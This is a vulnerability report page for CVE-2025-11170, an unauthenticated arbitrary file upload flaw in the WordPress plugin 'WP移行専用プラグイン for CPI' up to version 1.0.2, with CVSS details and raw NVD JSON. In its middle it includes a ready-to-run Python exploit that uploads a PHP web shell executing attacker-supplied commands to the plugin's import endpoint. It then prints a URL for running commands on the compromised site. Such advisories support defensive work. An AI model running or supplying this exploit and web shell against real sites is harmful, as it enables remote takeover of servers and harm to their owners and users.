Security Vulnerability Report
CVE-2025-11170 CVSS 9.8 CRITICAL


Published: 2025-11-11 04:15:41
Last Modified: 2026-04-15 00:35:42

Description

The WP移行専用プラグイン for CPI plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the Cpiwm_Import_Controller::import function in all versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP移行専用プラグイン for CPI <= 1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-11170 PoC - WordPress CPI Plugin Arbitrary File Upload
# Target: WP移行専用プラグイン for CPI <= 1.0.2

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"
upload_endpoint = f"{target_url}/wp-json/cpiwm/v1/import"

# Malicious PHP webshell content
webshell_content = "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>"

# Prepare the malicious file
files = {
    'file': ('shell.php', webshell_content, 'application/octet-stream')
}

try:
    print(f"[*] Attempting to upload malicious file to {target_url}")
    print(f"[*] Target endpoint: {upload_endpoint}")
    response = requests.post(upload_endpoint, files=files, timeout=10)
    if response.status_code == 200:
        print("[+] File upload appears successful!")
        print(f"[*] Try accessing: {target_url}/wp-content/uploads/shell.php?cmd=id")
    else:
        print(f"[-] Upload failed with status code: {response.status_code}")
        print(f"[*] Response: {response.text[:200]}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

References

https://wordpress.org/plugins/cpi-wp-migration/
https://www.wordfence.com/threat-intel/vulnerabilities/id/8a96d6d5-a5e3-4648-902b-f9d1f8e57e5c?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11170",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-11T04:15:41.273",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WP移行専用プラグイン for CPI plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the Cpiwm_Import_Controller::import function in all versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wordpress.org/plugins/cpi-wp-migration/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8a96d6d5-a5e3-4648-902b-f9d1f8e57e5c?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}